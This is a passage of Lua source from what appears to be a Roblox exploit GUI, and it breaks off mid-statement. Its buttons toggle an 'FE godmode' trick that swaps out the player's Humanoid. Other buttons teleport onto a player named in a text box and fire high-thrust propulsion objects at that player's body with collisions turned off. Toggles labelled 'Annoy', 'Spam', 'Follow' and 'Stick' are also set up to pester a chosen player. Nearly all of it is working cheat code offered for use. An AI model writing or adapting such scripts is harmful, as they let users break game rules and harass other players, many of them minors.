game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) spinning = false CoolSpin.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) end) CoolSpin.MouseButton1Click:connect(function() spinning = not spinning if spinning then local p = Instance.new("RocketPropulsion") p.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart p.Name = "CrazySpin" p.Target = game:GetService("Players").LocalPlayer.Character["Left Arm"] p:Fire() CoolSpin.BackgroundColor3 = Color3.new(0.992941, 0.811765, 0.2705882) else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CrazySpin:Destroy() CoolSpin.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://180612465" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local ScaredACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) ScaredACTIVE = false CrouchRocket.BackgroundColor3 = Color3.new(0.952941, 0.711765, 0.1705882) end) CrouchRocket.MouseButton1Click:connect(function() ScaredACTIVE = not ScaredACTIVE if ScaredACTIVE then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "CrouchRocket" u.Target = game:GetService("Players").LocalPlayer.Character.Head u:Fire() CrouchRocket.BackgroundColor3 = Color3.new(0.992941, 0.811765, 0.2705882) while wait() do if track.IsPlaying == false then if ScaredACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() CrouchRocket.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CrouchRocket:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local jumprocketnow = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) jumprocketnow = false JumpRocket.BackgroundColor3 = Color3.new(0.952941, 0.711765, 0.1705882) end) JumpRocket.MouseButton1Click:connect(function() jumprocketnow = not jumprocketnow if jumprocketnow then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "JumpRocket" u.Target = game:GetService("Players").LocalPlayer.Character.Head u:Fire() JumpRocket.BackgroundColor3 = Color3.new(0.992941, 0.811765, 0.2705882) while wait() do if track.IsPlaying == false then if jumprocketnow then track:Play(.1, 1, 1) end end end else track:Stop() JumpRocket.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.JumpRocket:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://126753849" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local RapidPunchACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) RapidPunchACTIVE = false RapidPunch.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) end) RapidPunch.MouseButton1Click:connect(function() RapidPunchACTIVE = not RapidPunchACTIVE if RapidPunchACTIVE then RapidPunch.BackgroundColor3 = Color3.new(0.1962745, 0.827451, 0.721569) while wait() do if track.IsPlaying == false then if RapidPunchACTIVE then track:Play(.1, 1, 10) end end end else track:Stop() RapidPunch.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) end end) FEGodmode.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" end) NoLimbs.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character["Left Leg"]:Destroy() game:GetService("Players").LocalPlayer.Character["Left Arm"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Leg"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Arm"]:Destroy() end) BrickHats.MouseButton1Click:connect(function() for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if (v:IsA("Accessory")) then v.Handle.Mesh:Destroy() end end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://181525546" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FaintACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) FaintACTIVE = false Faint.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end) Faint.MouseButton1Click:connect(function() FaintACTIVE = not FaintACTIVE if FaintACTIVE then Faint.BackgroundColor3 = Color3.new(0.756863, 0.466667, 0.878431) while wait() do if track.IsPlaying == false then if FaintACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() Faint.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://188632011" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SpinACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) SpinACTIVE = false Spin.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end) Spin.MouseButton1Click:connect(function() SpinACTIVE = not SpinACTIVE if SpinACTIVE then Spin.BackgroundColor3 = Color3.new(0.756863, 0.466667, 0.878431) while wait() do if track.IsPlaying == false then if SpinACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() Spin.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://33169583" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local ArmFollowACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) ArmFollowACTIVE = false ArmFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end) ArmFollow.MouseButton1Click:connect(function() ArmFollowACTIVE = not ArmFollowACTIVE if ArmFollowACTIVE then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "ArmFollow" u.Target = game:GetService("Players").LocalPlayer.Character["Right Arm"] u:Fire() ArmFollow.BackgroundColor3 = Color3.new(0.756863, 0.466667, 0.878431) while wait() do if track.IsPlaying == false then if ArmFollowACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() ArmFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.ArmFollow:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://126753849" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local PunchFollowACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) PunchFollowACTIVE = false PunchFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end) PunchFollow.MouseButton1Click:connect(function() PunchFollowACTIVE = not PunchFollowACTIVE if PunchFollowACTIVE then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "PunchFollow" u.Target = game:GetService("Players").LocalPlayer.Character["Right Arm"] u:Fire() PunchFollow.BackgroundColor3 = Color3.new(0.756863, 0.466667, 0.878431) while wait() do if track.IsPlaying == false then if PunchFollowACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() PunchFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.PunchFollow:Destroy() end end) AnimationId = "148840371" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) _18active = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) _18active = false _18.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end) _18.MouseButton1Click:connect(function() _18active = not _18active if _18active then _18.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do track:Play() while wait() do if _18active then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end end else track:Stop() _18.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://180612465" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local crouchattacking = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) crouchattacking = false CrouchAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end) CrouchAttack.MouseButton1Click:connect(function() crouchattacking = not crouchattacking if crouchattacking then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "CrouchAttack" for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do u.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart end u:Fire() CrouchAttack.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) while wait() do if track.IsPlaying == false then if crouchattacking then track:Play(.1, 1, 1) end end end else track:Stop() CrouchAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CrouchAttack:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SlamPropulsioning = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) SlamPropulsioning = false SlamPropulsion.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end) SlamPropulsion.MouseButton1Click:connect(function() SlamPropulsioning = not SlamPropulsioning if SlamPropulsioning then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "SlamPropulsion" for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do u.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart end u:Fire() SlamPropulsion.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) while wait() do if track.IsPlaying == false then if SlamPropulsioning then track:Play(.1, 1, 1) end end end else track:Stop() SlamPropulsion.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.SlamPropulsion:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://429730430" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SpinAttacking = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) SpinAttacking = false SpinAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end) SpinAttack.MouseButton1Click:connect(function() SpinAttacking = not SpinAttacking if SpinAttacking then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "SpinAttack" for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do u.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart end u:Fire() SpinAttack.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) while wait() do if track.IsPlaying == false then if SpinAttacking then track:Play(.1, 1, 1) end end end else track:Stop() SpinAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.SpinAttack:Destroy() end end) watching = false CreepyWatch.MouseButton1Click:connect(function() watching = not watching end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) walkingthrough = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) walkingthrough = false WalkThrough.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) end) WalkThrough.MouseButton1Click:connect(function() walkingthrough = not walkingthrough if walkingthrough then WalkThrough.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) while wait() do if walkingthrough then for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame if track.IsPlaying == false then if walkingthrough then track:Play(.1, 1, 1e6) end end end end end else WalkThrough.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) track:Stop() end end) annoying = false Annoy.MouseButton1Click:connect(function() annoying = not annoying end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local crawlACTIVE = false Carpett = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) Carpett = false Carpet.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end) Carpet.MouseButton1Click:connect(function() Carpett = not Carpett if Carpett then Carpet.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) while wait() do if track.IsPlaying == false then if Carpett then track:Play(.1, 1, 1) end end end else track:Stop() Carpet.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end end) following = false Follow.MouseButton1Click:connect(function() following = not following end) headwalking = false HeadWalk.MouseButton1Click:connect(function() headwalking = not headwalking end) Spammer = false Spam.MouseButton1Click:connect(function() Spammer = not Spammer end) stuck = false Stick.MouseButton1Click:connect(function() stuck = not stuck end) TeleportTo.MouseButton1Click:connect(function() for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) orbital = false Orbit.MouseButton1Click:connect(function() orbital = not orbital if orbital then Orbit.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) local o = Instance.new("RocketPropulsion") o.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart o.Name = "Orbit" for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do o.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart o:Fire() game:GetService('RunService').Stepped:connect(function() if orbital then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Orbit:Destroy() Orbit.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end end) currentview = false View.MouseButton1Click:connect(function() currentview = not currentview for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do if currentview then game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head View.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character.Head View.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end end end) floating = false Float.MouseButton1Click:connect(function() floating = not floating if floating then Float.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Float" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head y.Target = game:GetService("Players")[v.Name].Character.Head y:Fire() game:GetService('RunService').Stepped:connect(function() if floating then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) while wait(0.3) do if floating then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Leg"].CFrame end end end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Float:Destroy() Float.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) flattening = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) flattening = false Flatten.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end) Flatten.MouseButton1Click:connect(function() flattening = not flattening if flattening then Flatten.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Flatten" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head y.Target = game:GetService("Players")[v.Name].Character["Left Leg"] y:Fire() track:Play(.1, 1, 1) game:GetService('RunService').Stepped:connect(function() if flattening then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) while wait(0.3) do if flattening then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame + Vector3.new(0,2,0) end end end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Flatten:Destroy() track:Stop() Flatten.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) SlowAttracting = false SlowAttract.MouseButton1Click:connect(function() SlowAttracting = not SlowAttracting if SlowAttracting then SlowAttract.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local b = Instance.new("RocketPropulsion") b.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart b.TurnD = 5000 b.MaxThrust = 5000 b.MaxSpeed = 200 b.ThrustP = 5000 b.CartoonFactor = 1 b.Name = "SlowAttract" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do b.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart b:Fire() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head game:GetService('RunService').Stepped:connect(function() if SlowAttracting then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.SlowAttract:Destroy() SlowAttract.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) AimHeading = false AimHead.MouseButton1Click:connect(function() AimHeading = not AimHeading if AimHeading then AimHead.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local b = Instance.new("RocketPropulsion") b.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart b.TurnP = 2500 b.MaxThrust = 50000 b.MaxSpeed = 1000 b.ThrustP = 50000 b.CartoonFactor = 1 b.Name = "AimHead" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head b.Target = game:GetService("Players")[v.Name].Character.Head b:Fire() game:GetService('RunService').Stepped:connect(function() if AimHeading then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.AimHead:Destroy() AimHead.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) Multipleing = false Multiple.MouseButton1Click:connect(function() Multipleing = not Multipleing if Multipleing then Multiple.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local t1 = Instance.new("RocketPropulsion") t1.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t1.TurnP = 30000 t1.MaxThrust = 30000 t1.MaxSpeed = 1000 t1.ThrustP = 30000 t1.CartoonFactor = 1 t1.Name = "one" local t2 = Instance.new("RocketPropulsion") t2.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t2.TurnP = 30000 t2.MaxThrust = 30000 t2.MaxSpeed = 1000 t2.ThrustP = 30000 t2.CartoonFactor = 1 t2.Name = "two" local t3 = Instance.new("RocketPropulsion") t3.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t3.TurnP = 30000 t3.MaxThrust = 30000 t3.MaxSpeed = 1000 t3.ThrustP = 30000 t3.CartoonFactor = 1 t3.Name = "three" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do t1.Target = game:GetService("Players")[v.Name].Character.Torso t1:Fire() t2.Target = game:GetService("Players")[v.Name].Character["Right Leg"] t2:Fire() t3.Target = game:GetService("Players")[v.Name].Character["Left Arm"] t3:Fire() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head game:GetService('RunService').Stepped:connect(function() if Multipleing then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.one:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.two:Destroy() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.three:Destroy() Multiple.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) Violenting = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) Violenting = false Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end) Violent.MouseButton1Click:connect(function() Violenting = not Violenting if Violenting then Violent.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Violent" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do y.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart y:Fire() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head track:Play(.1, 1, 10) game:GetService('RunService').Stepped:connect(function() if Violenting then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Violent:Destroy() track:Stop() Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) Violenting = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) Violenting = false Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end) Violent.MouseButton1Click:connect(function() Violenting = not Violenting if Violenting then Violent.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 500000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Violent" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head y.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart y:Fire() track:Play(.1, 1, 10) game:GetService('RunService').Stepped:connect(function() if Violenting then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Violent:Destroy() track:Stop() Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) WeirdOrbital = false WeirdOrbit.MouseButton1Click:connect(function() WeirdOrbital = not WeirdOrbital if WeirdOrbital then WeirdOrbit.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local o = Instance.new("RocketPropulsion") o.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart o.TurnD = 50000 o.Name = "WeirdOrbit" for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do o.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart o:Fire() game:GetService('RunService').Stepped:connect(function() if WeirdOrbital then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.WeirdOrbit:Destroy() WeirdOrbit.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) Maxing = false Max.MouseButton1Click:connect(function() Maxing = not Maxing if Maxing then Max.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local t1 = Instance.new("RocketPropulsion") t1.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t1.TurnP = 100000 t1.MaxThrust = 100000 t1.MaxSpeed = 5000 t1.ThrustP = 100000 t1.CartoonFactor = 1 t1.Name = "onee" local t2 = Instance.new("RocketPropulsion") t2.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t2.TurnP = 100000 t2.MaxThrust = 100000 t2.MaxSpeed = 5000 t2.ThrustP = 100000 t2.CartoonFactor = 1 t2.Name = "twoo" local t3 = Instance.new("RocketPropulsion") t3.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t3.TurnP = 100000 t3.MaxThrust = 100000 t3.MaxSpeed = 5000 t3.ThrustP = 100000 t3.CartoonFactor = 1 t3.Name = "threee" local t4 = Instance.new("RocketPropulsion") t4.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t4.TurnP = 100000 t4.MaxThrust = 100000 t4.MaxSpeed = 5000 t4.ThrustP = 100000 t4.CartoonFactor = 1 t4.Name = "fourr" local t5 = Instance.new("RocketPropulsion") t5.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t5.TurnP = 100000 t5.MaxThrust = 100000 t5.MaxSpeed = 5000 t5.ThrustP = 100000 t5.CartoonFactor = 1 t5.Name = "fivee" local t6 = Instance.new("RocketPropulsion") t6.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart t6.TurnP = 100000 t6.MaxThrust 